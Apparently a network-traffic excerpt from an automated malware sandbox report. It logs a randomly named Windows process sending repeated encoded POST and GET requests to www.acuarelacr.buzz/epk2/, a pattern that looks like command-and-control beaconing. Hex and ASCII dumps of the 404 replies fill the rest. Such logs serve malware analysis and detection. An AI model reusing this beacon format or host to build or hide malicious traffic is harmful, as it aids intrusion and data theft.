                                                                                                                              Oct 7, 2024 12:34:35.712292910 CEST1236INData Raw: 70 63 61 46 74 57 34 48 38 69 49 30 67 42 32 4d 7a 66 45 63 56 33 67 42 2b 49 6b 66 44 74 62 79 43 41 54 67 74 48 42 37 6c 33 54 72 4b 55 47 32 79 57 4f 65 37 4f 32 4b 59 51 49 50 45 37 78 46 44 31 32 59 76 79 36 53 76 71 6f 4c 4f 4d 66 39 35 6b
                                                                                                                              Data Ascii: pcaFtW4H8iI0gB2MzfEcV3gB+IkfDtbyCATgtHB7l3TrKUG2yWOe7O2KYQIPE7xFD12Yvy6SvqoLOMf95k+BvgqogCFCx22NdltO1epYc7ycEKSaI9+UAYPGOlKDQYyxDP9Npqv0NKZkS7GuNRQig5pvaYQwdTztjRnCrr/l0b2UgO+wRtMiFCAzqpLL0So+hWmi61Nn3aqKGEzDfFrmEoKqcWSFDRONSrAU0iFYLrHU2RKB3q+
                                                                                                                              Oct 7, 2024 12:34:35.712301970 CEST1236INData Raw: 4f 4b 4a 75 39 38 56 30 30 36 4c 62 53 49 6b 76 42 73 52 6c 7a 42 50 59 6b 49 52 49 48 31 37 34 33 69 45 69 65 6c 42 54 34 69 51 52 6b 4e 48 77 55 51 4d 55 74 54 57 58 71 73 69 51 75 67 42 69 77 6c 37 33 4f 4f 72 56 30 52 49 71 2f 36 2b 42 49 50
                                                                                                                              Data Ascii: OKJu98V006LbSIkvBsRlzBPYkIRIH1743iEielBT4iQRkNHwUQMUtTWXqsiQugBiwl73OOrV0RIq/6+BIPPVVLrbAVAulQKIwAO/9jUKyJk51SmO5wwhpHXac0E3EQEfRIu6TfBYLQn/J3eCcFdE7i4dwmHckWErJsmU7eIsGnLxpVpVETI4kVM3VCUw1+XdRPRaM0k64jL1LEFkBBGRw7ad1ZE+AVH74Xh8NQM/dZMxVKDkPCy
                                                                                                                              Oct 7, 2024 12:34:35.712660074 CEST1236INData Raw: 30 66 58 32 77 65 53 38 38 58 37 58 36 68 58 52 44 44 52 7a 64 77 48 5a 2f 35 44 32 68 6a 6a 67 68 74 33 4d 62 35 79 31 4e 49 4e 71 2b 62 65 5a 42 75 38 64 38 34 36 35 37 77 50 59 66 4e 38 70 5a 42 63 30 67 2b 4a 4b 69 4b 59 69 4e 72 39 72 34 76
                                                                                                                              Data Ascii: 0fX2weS88X7X6hXRDDRzdwHZ/5D2hjjght3Mb5y1NINq+beZBu8d84657wPYfN8pZBc0g+JKiKYiNr9r4v1Zrvdbtazp16TSCOfZppMiGD6iVqr271oVokU6AJ9U5FGnXIww5mH+kLEhxI1cl20QCGCTgRMA/3+F2lRXXtzXhURPTTt9GQA6h+d/1dE5An9GRH5o5mwIgKHvhCBi5j60Bci8oe+EKEPrYmg+QNNOw3PdCLgpBUR
                                                                                                                              Oct 7, 2024 12:34:35.712668896 CEST1236INData Raw: 45 44 54 22 3e 20 57 65 62 4d 61 73 74 65 72 3c 2f 61 3e 2e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 72 65 61 73 6f 6e 2d 74 65 78 74 22 3e 54 68
                                                                                                                              Data Ascii: EDT"> WebMaster</a>. </section> <p class="reason-text">The server cannot find the requested page:</p> </div> <section class="additional-info"> <div class="container"> <div cl
                                                                                                                              Oct 7, 2024 12:34:35.712677002 CEST19INData Raw: 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: dy></html>0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              17192.168.2.650010161.97.168.245801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:34:40.966978073 CEST769OUTPOST /epk2/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.acuarelacr.buzz
                                                                                                                              Origin: http://www.acuarelacr.buzz
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 210
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.acuarelacr.buzz/epk2/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Raw: 65 6a 36 4c 65 3d 30 6a 36 70 6f 47 51 34 62 49 71 72 74 71 33 33 6f 79 43 6d 53 74 57 2f 6d 70 38 32 2b 74 32 59 4a 36 63 6c 69 64 6b 48 70 43 71 49 73 78 37 65 72 48 41 34 39 69 6b 65 35 75 5a 2f 4c 6d 76 62 34 48 2b 5a 47 4a 6e 2b 50 39 42 56 46 43 64 53 58 6c 65 48 47 4a 61 57 4c 48 48 55 4a 6d 6f 67 64 52 68 2f 66 6c 6a 37 72 66 79 46 73 6b 44 58 45 49 37 38 55 57 55 75 67 4b 47 70 31 74 6a 70 48 35 35 52 44 50 69 51 57 62 49 2f 43 38 65 6f 49 55 4c 71 34 71 50 33 6d 42 62 6b 4b 72 62 61 4a 65 36 70 68 38 73 67 32 2f 79 4a 4d 71 4f 51 53 52 44 4b 47 47 36 2b 70 2f 35 77 41 43 38 45 53 65 78 44 4f 67 32 61 35 39 74 31
                                                                                                                              Data Ascii: ej6Le=0j6poGQ4bIqrtq33oyCmStW/mp82+t2YJ6clidkHpCqIsx7erHA49ike5uZ/Lmvb4H+ZGJn+P9BVFCdSXleHGJaWLHHUJmogdRh/flj7rfyFskDXEI78UWUugKGp1tjpH55RDPiQWbI/C8eoIULq4qP3mBbkKrbaJe6ph8sg2/yJMqOQSRDKGG6+p/5wAC8ESexDOg2a59t1
                                                                                                                              Oct 7, 2024 12:34:41.558974981 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx
                                                                                                                              Date: Mon, 07 Oct 2024 10:34:41 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              ETag: W/"66cd104a-b96"
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                                                              Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                                                                              Oct 7, 2024 12:34:41.559026957 CEST370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                                                              Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              18192.168.2.650011161.97.168.245801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:34:43.512648106 CEST793OUTPOST /epk2/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.acuarelacr.buzz
                                                                                                                              Origin: http://www.acuarelacr.buzz
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 234
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.acuarelacr.buzz/epk2/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Raw: 65 6a 36 4c 65 3d 30 6a 36 70 6f 47 51 34 62 49 71 72 74 4b 48 33 72 56 65 6d 44 64 57 38 6a 70 38 32 30 4e 32 63 4a 36 51 6c 69 63 52 41 70 77 4f 49 73 55 66 65 71 46 6b 34 77 43 6b 65 79 4f 5a 36 57 57 76 51 34 48 79 72 47 4d 48 2b 50 39 56 56 46 44 74 53 58 55 65 45 47 5a 61 55 44 6e 48 57 47 47 6f 67 64 52 68 2f 66 6c 33 42 72 66 71 46 76 56 54 58 46 70 37 6a 4b 47 55 76 6c 4b 47 70 78 74 6a 6c 48 35 35 7a 44 4f 76 31 57 5a 41 2f 43 38 75 6f 4c 41 66 6c 6a 36 50 31 72 68 61 4a 45 61 71 6d 4c 6f 6e 72 6c 71 6b 54 76 74 4b 74 45 38 50 4b 4f 69 44 70 55 57 61 38 70 39 68 43 41 69 38 75 51 65 4a 44 63 33 36 39 32 4a 49 57 73 42 6d 57 4a 43 49 34 35 36 6c 61 6f 57 48 62 30 6f 79 47 36 51 3d 3d
                                                                                                                              Data Ascii: ej6Le=0j6poGQ4bIqrtKH3rVemDdW8jp820N2cJ6QlicRApwOIsUfeqFk4wCkeyOZ6WWvQ4HyrGMH+P9VVFDtSXUeEGZaUDnHWGGogdRh/fl3BrfqFvVTXFp7jKGUvlKGpxtjlH55zDOv1WZA/C8uoLAflj6P1rhaJEaqmLonrlqkTvtKtE8PKOiDpUWa8p9hCAi8uQeJDc3692JIWsBmWJCI456laoWHb0oyG6Q==
                                                                                                                              Oct 7, 2024 12:34:44.112163067 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx
                                                                                                                              Date: Mon, 07 Oct 2024 10:34:44 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              ETag: W/"66cd104a-b96"
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                                                              Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                                                                              Oct 7, 2024 12:34:44.112292051 CEST370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                                                              Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              19192.168.2.650012161.97.168.245801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:34:46.057806015 CEST1806OUTPOST /epk2/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.acuarelacr.buzz
                                                                                                                              Origin: http://www.acuarelacr.buzz
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 1246
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.acuarelacr.buzz/epk2/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Raw: 65 6a 36 4c 65 3d 30 6a 36 70 6f 47 51 34 62 49 71 72 74 4b 48 33 72 56 65 6d 44 64 57 38 6a 70 38 32 30 4e 32 63 4a 36 51 6c 69 63 52 41 70 77 47 49 73 43 54 65 71 6b 6b 34 78 43 6b 65 78 4f 5a 37 57 57 76 42 34 48 62 67 47 4d 44 45 50 2f 74 56 46 67 31 53 56 67 71 45 54 70 61 55 42 6e 48 56 4a 6d 70 30 64 52 78 37 66 6d 50 42 72 66 71 46 76 58 37 58 43 34 37 6a 49 47 55 75 67 4b 47 6c 31 74 6a 42 48 35 68 4a 44 4f 72 50 56 71 34 2f 44 59 43 6f 4f 31 4c 6c 2b 71 50 37 6c 42 61 52 45 61 6d 44 4c 73 48 52 6c 71 34 71 76 74 2b 74 55 5a 2b 51 66 7a 50 57 41 32 61 6a 6f 50 6c 54 62 33 49 71 53 76 31 4f 62 45 36 38 31 6f 51 35 72 47 2b 53 4d 6a 4a 4a 75 61 73 76 72 44 4b 62 77 6f 6a 6f 71 6b 6e 35 73 65 68 64 78 34 4c 65 56 64 39 31 64 5a 32 74 30 75 42 65 66 78 68 63 4b 71 34 74 53 2f 32 53 42 78 46 31 34 2b 6f 4e 77 6d 39 76 6c 6f 6f 36 77 34 46 33 4a 75 43 4d 77 4d 70 6d 62 54 2b 77 4e 67 2b 4b 58 36 59 74 76 58 65 64 6f 31 61 44 37 39 74 6b 4e 43 32 62 4b 6d 61 72 4b 61 4b 78 33 30 31 44 36 53 75 71 [TRUNCATED]
                                                                                                                              Data Ascii: ej6Le=0j6poGQ4bIqrtKH3rVemDdW8jp820N2cJ6QlicRApwGIsCTeqkk4xCkexOZ7WWvB4HbgGMDEP/tVFg1SVgqETpaUBnHVJmp0dRx7fmPBrfqFvX7XC47jIGUugKGl1tjBH5hJDOrPVq4/DYCoO1Ll+qP7lBaREamDLsHRlq4qvt+tUZ+QfzPWA2ajoPlTb3IqSv1ObE681oQ5rG+SMjJJuasvrDKbwojoqkn5sehdx4LeVd91dZ2t0uBefxhcKq4tS/2SBxF14+oNwm9vloo6w4F3JuCMwMpmbT+wNg+KX6YtvXedo1aD79tkNC2bKmarKaKx301D6SuqHjj6oMad6qzNLxquB/XQpBtrEforn2I3UGwxwfarboY1eUAntMrFPiR1ymtpNQV1Xd/cxQ3ZUs85H2WCkNqvWMvma9s4SUaUzpVxly4qW68bfHZsQMX2Du55ebpn9B2U0uOK54Atyla2y1iiJoC5sN61mQcn1aiL8xIWnUdc5cDSVgvKdFFHKmvMzXBpKV2JNsqzqh8LuVM4Tv2ZOjexLzd8ZuAqePJCMjDT8r2h4oRiYFoXsM8e78+FKEYTblCp56YDUTQ0+5bq7f/aaG2/hJjipv8xC32VpnDDMotCWQrClwx8x3EwlBXZ0CThCNXXjaUdq0mENDzS4QvRBhqkmnuK2wPsAEPst3DjXsUUu+cIeVpRiAT5f2Bk9yH4MVXHhMvP4KzPQFSf1/xlsYxvPy0psQZ5/TG3AqRl5EsyK7Nm6iy3rXYLKx+ddIozFIuixUbaWOQt2ucvKhHffT9/dFP5TLIpna3M1rYLxufV35lLsRpx94HGfh6fY+i1R1XaZpkHngGHyUjcKkzhfa2XLJ39CoWpvGBsgVBZzs1HxCuKIgNQ0hXh+YGBABxZkqPvY/FjFJnzi/Fs9XEDFrItiulAukMDli2l1eu5z/oJPdaa4WlUNHOTndE/pEAYZ18uEOfDVf322t1yhPA9Nsg2Gq9eRNifoy842k [TRUNCATED]
                                                                                                                              Oct 7, 2024 12:34:46.651693106 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx
                                                                                                                              Date: Mon, 07 Oct 2024 10:34:46 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              ETag: W/"66cd104a-b96"
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                                                              Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                                                                              Oct 7, 2024 12:34:46.651757002 CEST370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                                                              Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              20192.168.2.650013161.97.168.245801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:34:48.603678942 CEST507OUTGET /epk2/?ej6Le=5hSJrytQEf2r193N2AyKKNas1p8do7y+C8hF198jiQrVzRfSjh9C72xB1f8gK0fXwE+oGLvPau9gCypTG2u5T5i3An2mBAgKXA59UHv+xIL7sVXWIuP/SFcs74Xei//AEoJSK5E=&An=mLdxo2Y8RLRh HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.acuarelacr.buzz
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Oct 7, 2024 12:34:49.205775023 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx
                                                                                                                              Date: Mon, 07 Oct 2024 10:34:49 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Content-Length: 2966
                                                                                                                              Connection: close
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              ETag: "66cd104a-b96"
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                                                                                              Oct 7, 2024 12:34:49.205941916 CEST1236INData Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                                                                                                              Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                                                                                                                              Oct 7, 2024 12:34:49.205952883 CEST698INData Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e
